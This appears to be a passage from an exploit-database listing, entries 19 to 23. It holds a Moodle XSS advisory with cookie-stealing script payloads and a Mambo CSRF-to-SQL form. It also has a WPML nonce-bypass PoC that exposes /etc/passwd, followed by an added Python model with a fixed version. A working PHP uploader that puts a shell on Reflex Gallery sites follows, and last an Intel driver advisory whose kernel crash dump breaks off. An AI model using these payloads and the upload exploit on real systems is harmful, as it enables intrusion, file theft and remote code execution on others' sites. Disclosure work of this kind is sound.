  19. Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting

Vendor: Moodle Pty Ltd
Product web page: https://www.moodle.org
Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9

Summary: Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments.

Desc: Moodle suffers from persistent XSS vulnerabilities. Input passed to the POST parameters 'config_title' and 'title' through index.php is not properly sanitized, allowing the attacker to execute HTML or JS code in the user's browser session on the affected site. Affected components: Blocks, Glossary, RSS and Tags.

Tested on: nginx
           PHP/5.4.22

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5236
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php

Vendor Advisory ID: MSA-15-0013
Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383

CVE ID: CVE-2015-2269
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269

09.02.2015

--

Random Glossary Entry
---------------------

POST http://WEB/my/index.php HTTP/1.1

_qf__block_glossary_random_edit_form=1
bui_contexts=0
bui_defaultregion=side-pre
bui_defaultweight=4
bui_editid=304
bui_editingatfrontpage=0
bui_pagetypepattern=my-index
bui_parentcontextid=411
bui_region=side-pre
bui_subpagepattern=%@NULL@%
bui_visible=1
bui_weight=4
config_addentry=test
config_invisible=test2
config_refresh=0
config_showconcept=1
config_title=" onmouseover=prompt("XSS1") >
config_type=0
config_viewglossary=test3
mform_isexpanded_id_configheader=1
mform_isexpanded_id_onthispage=0
mform_isexpanded_id_whereheader=0
sesskey=S8TXvxdEKF
submitbutton=Save changes

Remote RSS Feeds
----------------

POST http://WEB/my/index.php HTTP/1.1

_qf__block_rss_client_edit_form=1
bui_contexts=0
bui_defaultregion=side-pre
bui_defaultweight=4
bui_editid=312
bui_editingatfrontpage=0
bui_pagetypepattern=my-index
bui_parentcontextid=411
bui_region=side-pre
bui_subpagepattern=%@NULL@%
bui_visible=1
bui_weight=4
config_block_rss_client_show_channel_image=0
config_block_rss_client_show_channel_link=0
config_display_description=0
config_rssid=_qf__force_multiselect_submission
config_rssid[]=3
config_shownumentries=11
config_title=" onmouseover=prompt("XSS2") >
mform_isexpanded_id_configheader=1
mform_isexpanded_id_onthispage=0
mform_isexpanded_id_whereheader=0
sesskey=S8TXvxdEKF
submitbutton=Save changes

Tags
----

POST http://WEB/my/index.php HTTP/1.1

_qf__block_tags_edit_form=1
bui_contexts=0
bui_defaultregion=side-pre
bui_defaultweight=4
bui_editid=313
bui_editingatfrontpage=0
bui_pagetypepattern=my-index
bui_parentcontextid=411
bui_region=side-pre
bui_subpagepattern=%@NULL@%
bui_visible=1
bui_weight=4
config_numberoftags=80
config_tagtype=
config_title=Tags" onmouseover=prompt("XSS3") >
mform_isexpanded_id_configheader=1
mform_isexpanded_id_onthispage=0
mform_isexpanded_id_whereheader=0
sesskey=S8TXvxdEKF
submitbutton=Save changes

Older not supported versions
----------------------------

POST http://WEB/blog/index.php HTTP/1.1

blockaction=config
filterselect=1343
filtertype=user
instanceid=4992
numberoftags=20
sesskey=0QCG5LQz0Q
sort=name
timewithin=90
title=ZSL"><script>alert(document.cookie);</script>
Source
  20. # Affected software: Mambo
# Type of vulnerability: csrf to sql injection
# URL: http://source.mambo-foundation.org/
# Discovered by: Provensec
# Website: http://www.provensec.com
# version 4.6.5

# Proof of concept

No CSRF token is used on the SQL query form, so an attacker can leverage CSRF to execute SQL queries on the admin end.

screenshot http://prntscr.com/6gk265

POST /mambo/administrator/index2.php HTTP/1.1
Host: demo.opensourcecms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.opensourcecms.com/mambo/administrator/index2.php
Cookie: __utma=87180614.347131305.1423813196.1426315580.1426317582.5; __utmz=87180614.1424330089.2.2.utmcsr=4homepages.de|utmccn=(referral)|utmcmd=referral|utmcct=/demo/; __gads=ID=e4fef836c4eca064:T=1424329959:S=ALNI_MZOrjDhCaPQBQcowebgQWskHX12kQ; __utmc=87180614; 5503d94d48147_SESSION=ben7euhc7r3j578q73sbnn9oq4; __utmb=87180614.1.10.1426317586; __utmt=1; 25fee453fc1b1d324265b9cb23363e2c=san1g4th13mhokc4g5tk3muaa3; mostlyce[startup_key]=f1df635c5e35c15a244c554e356ad0e3; mostlyce[usertype]=Super+Administrator; webfxtab_modules-cpanel=4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

sql=select&option=com_mostlydbadmin&task=xquery

vulnerable parameter: sql

poc

<html>
  <body>
    <form action="http://demo.opensourcecms.com/mambo/administrator/index2.php" method="POST">
      <input type="hidden" name="sql" value="sql statement to execute " />
      <input type="hidden" name="option" value="com_mostlydbadmin" />
      <input type="hidden" name="task" value="xquery" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Source
  21. One more vulnerability reported on March 02 and fixed in version 3.1.9:

4. Unauthenticated administrative functions

An unauthenticated attacker may under certain conditions bypass WPML's nonce check and perform administrative functions.

The administrative ajax functions are protected with nonces to prevent unauthorised use. Login state is not checked. If the nonce check fails with the $_REQUEST values, there is a secondary check that also has to fail before the request is denied:

    if (!( isset( $_GET[ 'icl_ajx_action' ] ) && $_GET[ 'nonce' ] == wp_create_nonce( $_GET[ 'icl_ajx_action' ] ) )) {
        die('Invalid nonce');
    }

The problem is the mixed use of $_REQUEST and $_GET. If the above check succeeds, subsequent code again uses $_REQUEST instead of $_GET to determine the ajax action to perform.

If the attacker has a valid nonce generated by the target WordPress site - from any plug-in or the core system - then they can pass the above check. They can then define a different ajax action in POST parameters to perform administrative functions without authentication.

An unauthenticated attacker could then execute any of the about 50 WPML ajax actions intended for administrators only. There is a lot of choice for manipulating or destroying data. For instance, it's possible to define a root html file which is evaluated as

    include $html_file;

This would allow reading server-side files or evaluating PHP code hosted on remote sites (if allowed by PHP settings).

A default WordPress installation with only WPML installed apparently doesn't generate nonces for unauthenticated users, so this is probably not exploitable unless there are other plug-ins installed. For example bbpress generates nonces for unauthenticated users.

Proof of concept:

    <form method=POST action="https://YOUR.WORDPRESS.BLOG/?icl_ajx_action=toggle-subscription_10&nonce=1234567890">
    <input type=hidden name="icl_ajx_action" value="icl_save_language_negotiation_type">
    <input type=hidden name="_icl_nonce" value="(ignored)">
    <input type=hidden name="icl_language_negotiation_type" value="1">
    <input type=hidden name="use_directory" value="1">
    <input type=hidden name="show_on_root" value="html_file">
    <input type=hidden name="root_html_file_path" value="/etc/passwd">
    <input type=submit>
    </form>

In the above example, a toggle-subscription nonce generated by bbpress is used. It can be retrieved by unauthenticated users (go to a forum page, view source). On submitting the form, WPML will pass the ajax action because the bbpress nonce is valid. The ajax action is determined from the POST parameters. In this example, WPML settings would be changed so that the contents of /etc/passwd are shown as the default page on the website.

This PoC was successfully tested with WPML 3.1.7.2.

--
Jouko Pynnönen <jouko@iki.fi>
Klikki Oy - http://klikki.fi - Twitter: @klikkioy
Source
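Added example, not WPML's or WordPress's code: a Python model of the parameter-source confusion described in the advisory, with the vulnerable dispatch beside a corrected one. The nonce scheme here is a constructed HMAC over the action name only (WordPress nonces also fold in the user and a time window), the action list is a placeholder, and PHP's $_REQUEST is modelled with its default order, where POST values override GET values. The point the example makes executable: a nonce proves the caller held a token for the action it was issued for, so the check must run against the action that is actually dispatched, from the same parameter source, after the login and capability check.

```python
import hashlib
import hmac

# Constructed site key and action list (placeholders, not WPML's).
SITE_KEY = b"constructed-site-key"
ADMIN_ACTIONS = {"icl_save_language_negotiation_type"}


def create_nonce(action, key=SITE_KEY):
    """Token bound to one action name (stand-in for wp_create_nonce)."""
    return hmac.new(key, action.encode(), hashlib.sha256).hexdigest()[:10]


def verify_nonce(nonce, action, key=SITE_KEY):
    return hmac.compare_digest(nonce, create_nonce(action, key))


def php_request(get, post):
    """$_REQUEST with PHP's default request order: POST overrides GET."""
    merged = dict(get)
    merged.update(post)
    return merged


def vulnerable_dispatch(get, post):
    """Mirrors the flawed path: the nonce is validated against the action in
    $_GET, but the handler is chosen from $_REQUEST, so a POST value can name
    a different (admin-only) action. Login state is never consulted."""
    if not (get.get("icl_ajx_action")
            and verify_nonce(get.get("nonce", ""), get["icl_ajx_action"])):
        return "Invalid nonce"
    action = php_request(get, post)["icl_ajx_action"]
    return "ran " + action


def fixed_dispatch(get, post, user_is_admin):
    """Hardened: require an admin session first, take the action from one
    source, reject unknown actions, and verify the nonce against exactly the
    action that will run."""
    if not user_is_admin:
        return "denied: not logged in"
    action = post.get("icl_ajx_action") or get.get("icl_ajx_action") or ""
    if action not in ADMIN_ACTIONS:
        return "denied: unknown action"
    nonce = post.get("_icl_nonce") or get.get("nonce", "")
    if not verify_nonce(nonce, action):
        return "Invalid nonce"
    return "ran " + action


if __name__ == "__main__":
    # A nonce for an unrelated public action, as an unauthenticated user could
    # obtain from another plug-in's page source.
    leaked = create_nonce("toggle-subscription_10")
    get = {"icl_ajx_action": "toggle-subscription_10", "nonce": leaked}
    post = {"icl_ajx_action": "icl_save_language_negotiation_type", "_icl_nonce": "(ignored)"}
    print("vulnerable:", vulnerable_dispatch(get, post))
    print("fixed:     ", fixed_dispatch(get, post, user_is_admin=False))
```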
  22. <?php
/*
# Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
# TIPE: Arbitrary File Upload
# Google DORK: inurl:"wp-content/plugins/reflex-gallery/"
# Vendor: https://wordpress.org/plugins/reflex-gallery/
# Tested on: Linux
# Version: 3.1.3 (Last)
# EXECUTE: php exploit.php www.alvo.com.br shell.php
# OUTPUT: Exploit_AFU.txt
# POC http://i.imgur.com/mpjXaZ9.png
# REF COD http://1337day.com/exploit/23369
--------------------------------------------------------------------------------
<form method = "POST" action = "" enctype = "multipart/form-data" >
<input type = "file" name = "qqfile"><br>
<input type = "submit" name = "Submit" value = "Pwn!">
</form >
--------------------------------------------------------------------------------
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl/
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
*/

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

function __plus() {
    ob_flush();
    flush();
}

function __request($params) {
    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => "@{$params['file']}"));
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    $info['corpo'] = curl_exec($objcurl) . __plus();
    $info['server'] = curl_getinfo($objcurl) . __plus();
    curl_close($objcurl) . __plus();
    return $info;
}

echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n";

$params = array(
    'file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO] DEFINE FILE SHELL!\n"),
    'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")
);

__request($params) . __plus();

// the uploader stores the file under the Year/Month path given in the query string
$_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}";
$_h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1);
foreach ($_h as $key => $value) {
    echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n";
}
$_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200'));
print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL');
print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+] {$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) : '[-] ERROR!');
Source
  23. /*
Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability

Vendor: Intel
Product webpage: http://www.intel.com
Affected product(s):
  Network Adapter Driver for Windows XP
  Network Adapter Driver for Windows 7
  Network Adapter Driver for Windows 8
  Network Adapter Driver for Windows 2008/R2
  Network Adapter Driver for Windows 2012/R2
Affected version(s):
  Intel(R) iQVW64.SYS v1.03.0.7
  Intel(R) iQVW32.SYS v1.03.0.7
Tested Operating systems:
  Windows XP SP3 (32-bit)
  Windows 7 SP1 (32/64-bit)
Date: 14/03/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-2291

Disclosure Timeline:
10-06-2014: Vendor Notification
21-06-2014: Vendor Response/Feedback
08-08-2014: Vendor Response/Feedback
26-08-2014: Requesting Status/No Vendor Response
30-09-2014: Requesting Status/No Vendor Response
22-10-2014: Requesting Status/No Vendor Response
10-01-2015: Requesting Status/No Vendor Response
15-01-2015: Requesting Status/No Vendor Response
14-03-2015: CVE Requested
14-03-2015: CVE Assigned
14-03-2015: Public Disclosure

Description:
A vulnerability in the iqvw32.sys and iqvw64e.sys drivers has been discovered in the Intel Network Adapter Driver. The vulnerability exists due to insufficient input buffer validation when the driver processes IOCTL codes 0x80862013, 0x8086200B, 0x8086200F and 0x80862007 using METHOD_NEITHER, and due to insecure permissions allowing everyone read and write access to privileged-use-only functionality. Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.

IOCTL 0x80862013
----------------

Microsoft (R) Windows Debugger Version 6.2.9200.20512 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

Opened \\.\pipe\com_2
Waiting to reconnect...
Connected to Windows 7 7601 x64 target at (Thu Feb 26 18:33:59.291 2015 (UTC + 2:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*k:\symbols*http://msdl.microsoft.com/download/symbols;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\google*http://chromium-browser-symsrv.commondatastorage.googleapis.com;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\microsoft*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 7 Kernel Version 7601 MP (1 procs) Free x64
Built by: 7601.18700.amd64fre.win7sp1_gdr.141211-1742
Machine Name:
Kernel base = 0xfffff800`03655000 PsLoadedModuleList = 0xfffff800`03898890
System Uptime: not available
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x0000003b
                       (0x00000000C0000005,0xFFFFF88005A0BFD2,0xFFFFF8800653A9C0,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

Connected to Windows 7 7601 x64 target at (Thu Feb 26 20:29:05.978 2015 (UTC + 2:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
...............................
Loading User Symbols
.....
Loading unloaded module list
....Unable to enumerate user-mode unloaded modules, Win32 error 0n30
Loading Wow64 Symbols
.....
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 3B, {c0000005, fffff88005a0bfd2, fffff8800653a9c0, 0}

*** ERROR: Module load completed but symbols could not be loaded for iqvw64e.sys

Followup: MachineOwner
---------

nt!RtlpBreakWithStatusInstruction:
fffff800`036c3cb0 cc              int     3
3: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff88005a0bfd2, Address of the instruction which caused the bugcheck
Arg3: fffff8800653a9c0, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.

Debugging Details:
------------------

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

FAULTING_IP:
iqvw64e+3fd2
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx]

CONTEXT:  fffff8800653a9c0 -- (.cxr 0xfffff8800653a9c0)
rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0         nv up ei pl nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx] ds:002b:00000000`deadbeef=????????????????
Resetting default scope DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT BUGCHECK_STR: 0x3B PROCESS_NAME: ConsoleApplica CURRENT_IRQL: 2 LAST_CONTROL_TRANSFER: from fffff88005a091ac to fffff88005a0bfd2 STACK_TEXT: fffff880`0653b3a0 fffff880`05a091ac : fffffa80`4aac7b00 00000000`00000001 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x3fd2 fffff880`0653b8a0 fffff800`039e80f7 : 00000000`80862013 fffff880`0653bb60 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x11ac fffff880`0653b8d0 fffff800`039e8956 : fffff680`003b5ee8 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x607 fffff880`0653ba00 fffff800`036cb113 : 00000000`0021df01 0000007f`ffffffff 00000000`0021df00 00000980`00000000 : nt!NtDeviceIoControlFile+0x56 fffff880`0653ba70 00000000`73b02e09 : 00000000`73b02944 00000000`775a01b4 00000000`73b70023 00000000`00000246 : nt!KiSystemServiceCopyEnd+0x13 00000000`0021e898 00000000`73b02944 : 00000000`775a01b4 00000000`73b70023 00000000`00000246 00000000`001dff7c : wow64cpu!CpupSyscallStub+0x9 00000000`0021e8a0 00000000`73b7d286 : 00000000`00000000 00000000`73b01920 00000000`0021eb30 00000000`773decf1 : wow64cpu!DeviceIoctlFileFault+0x31 00000000`0021e960 00000000`73b7c69e : 00000000`00000000 00000000`00000000 00000000`73b74b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa 00000000`0021e9b0 00000000`773f4966 : 00000000`003331f0 00000000`00000000 00000000`774e2670 00000000`774b5978 : wow64!Wow64LdrpInitialize+0x42a 00000000`0021ef00 00000000`773f1937 : 00000000`00000000 00000000`773f4071 00000000`0021f4b0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3 00000000`0021f3f0 00000000`773dc34e : 00000000`0021f4b0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? 
::FNODOBFM::`string'+0x28ff0 00000000`0021f460 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe FOLLOWUP_IP: iqvw64e+3fd2 fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: iqvw64e+3fd2 FOLLOWUP_NAME: MachineOwner MODULE_NAME: iqvw64e IMAGE_NAME: iqvw64e.sys DEBUG_FLR_IMAGE_TIMESTAMP: 5284eac3 STACK_COMMAND: .cxr 0xfffff8800653a9c0 ; kb FAILURE_BUCKET_ID: X64_0x3B_iqvw64e+3fd2 BUCKET_ID: X64_0x3B_iqvw64e+3fd2 Followup: MachineOwner --------- 3: kd> u fffff880`05a0bfd2 iqvw64e+0x3fd2: fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] fffff880`05a0bfd5 488d0d14160000 lea rcx,[iqvw64e+0x55f0 (fffff880`05a0d5f0)] fffff880`05a0bfdc e84fdfffff call iqvw64e+0x1f30 (fffff880`05a09f30) fffff880`05a0bfe1 488b17 mov rdx,qword ptr [rdi] fffff880`05a0bfe4 488d42ff lea rax,[rdx-1] fffff880`05a0bfe8 4883f807 cmp rax,7 fffff880`05a0bfec 0f8718020000 ja iqvw64e+0x420a (fffff880`05a0c20a) fffff880`05a0bff2 488d0d07c0ffff lea rcx,[iqvw64e (fffff880`05a08000)] 3: kd> !for_each_frame .frame /r @$Frame _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction 00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000 rip=fffff800036c3cb0 rsp=fffff88006539988 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=000000000000003b r13=0000000000000001 r14=0000000040000082 r15=0000000000000003 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!RtlpBreakWithStatusInstruction: fffff800`036c3cb0 cc int 3 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12 01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12 rax=0000000000000000 rbx=0000000000000003 
rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000 rip=fffff800037bba62 rsp=fffff88006539990 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=000000000000003b r13=0000000000000001 r14=0000000040000082 r15=0000000000000003 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiBugCheckDebugBreak+0x12: fffff800`037bba62 eb75 jmp nt!KiBugCheckDebugBreak+0x89 (fffff800`037bbad9) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e 02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e rax=0000000000000000 rbx=0000000000000065 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000 rip=fffff800037bc84e rsp=fffff880065399f0 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=000000000000003b r13=0000000000000001 r14=0000000040000082 r15=0000000000000003 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KeBugCheck2+0x71e: fffff800`037bc84e eb11 jmp nt!KeBugCheck2+0x731 (fffff800`037bc861) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104 03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104 rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036cbf84 rsp=fffff8800653a0c0 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KeBugCheckEx+0x104: fffff800`036cbf84 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69 04 fffff880`0653a100 fffff800`036cad7c 
nt!KiBugCheckDispatch+0x69 rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036cb429 rsp=fffff8800653a100 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiBugCheckDispatch+0x69: fffff800`036cb429 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c 05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036cad7c rsp=fffff8800653a240 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiSystemServiceHandler+0x7c: fffff800`036cad7c b801000000 mov eax,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd 06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036f6a4d rsp=fffff8800653a280 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!RtlpExecuteHandlerForException+0xd: fffff800`036f6a4d 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 07 fffff880`0653a2b0 fffff800`037067b1 
nt!RtlDispatchException+0x415 07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415 rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036f5825 rsp=fffff8800653a2b0 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!RtlDispatchException+0x415: fffff800`036f5825 0fba257fc51d0017 bt dword ptr [nt!NtGlobalFlag (fffff800`038d1dac)],17h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135 08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135 rax=0000000000000000 rbx=fffff8800653b168 rcx=0000000000000003 rdx=000000000000008a rsi=fffff8800653b210 rdi=00000000deadbeef rip=fffff800037067b1 rsp=fffff8800653a990 rbp=fffff8800653aec0 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff8800653a9c0 r13=000000000010001f r14=fffff8800653b030 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiDispatchException+0x135: fffff800`037067b1 84c0 test al,al _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2 09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2 rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef rip=fffff800036cb502 rsp=fffff8800653b030 rbp=fffff8800653b290 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiExceptionDispatch+0xc2: 
